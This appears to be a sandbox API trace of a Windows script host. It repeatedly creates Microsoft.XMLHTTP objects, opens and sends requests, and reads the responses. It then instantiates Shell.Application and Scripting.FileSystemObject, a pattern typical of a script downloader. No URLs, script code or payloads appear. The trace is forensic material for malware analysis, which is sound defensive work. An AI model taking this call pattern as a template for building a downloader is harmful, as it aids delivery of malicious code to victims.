	[0824.247] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.247] SysStringLen (param_1=0x0) returned 0x0
	[0824.247] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.247] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0824.247] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.247] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0824.247] ??2@YAPEAX_K@Z () returned 0x62f310
	[0824.248] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0824.248] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.248] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0824.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0824.248] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0824.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.248] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0824.249] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.249] SysStringLen (param_1=0x0) returned 0x0
	[0824.249] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.249] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0824.249] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0824.249] ??2@YAPEAX_K@Z () returned 0x62f330
	[0824.249] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0824.249] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.249] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0824.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0824.250] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0824.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.250] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0824.250] longjmp () 
	[0824.250] longjmp () 
	[0824.251] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.251] SysStringLen (param_1=0x0) returned 0x0
	[0824.251] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.251] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0824.251] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0824.251] ??2@YAPEAX_K@Z () returned 0x62f310
	[0824.251] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0824.251] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.251] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0824.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0824.252] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0824.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.252] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0824.252] longjmp () 
	[0824.252] longjmp () 
	[0824.252] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0824.252] SysStringLen (param_1=0x0) returned 0x0
	[0824.252] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0824.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0824.253] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0824.253] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0824.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0824.253] ??2@YAPEAX_K@Z () returned 0x62f330
	[0824.253] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0824.253] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0824.253] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0824.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0824.253] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0824.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0824.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0824.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0824.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0824.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0827.573] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0827.574] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0827.574] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0827.574] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0827.574] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0827.574] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0827.574] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0827.574] SysStringLen (param_1=0x0) returned 0x0
	[0827.574] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0827.575] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0827.575] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0827.575] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0827.575] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0827.575] ??2@YAPEAX_K@Z () returned 0x62f350
	[0827.575] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0827.575] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0827.575] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0827.575] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0827.575] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0827.575] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0827.575] SysStringLen (param_1=0x0) returned 0x0
	[0827.575] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0827.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0827.578] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0827.578] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0827.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0827.578] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0827.578] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0838.678] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0838.678] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0838.679] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
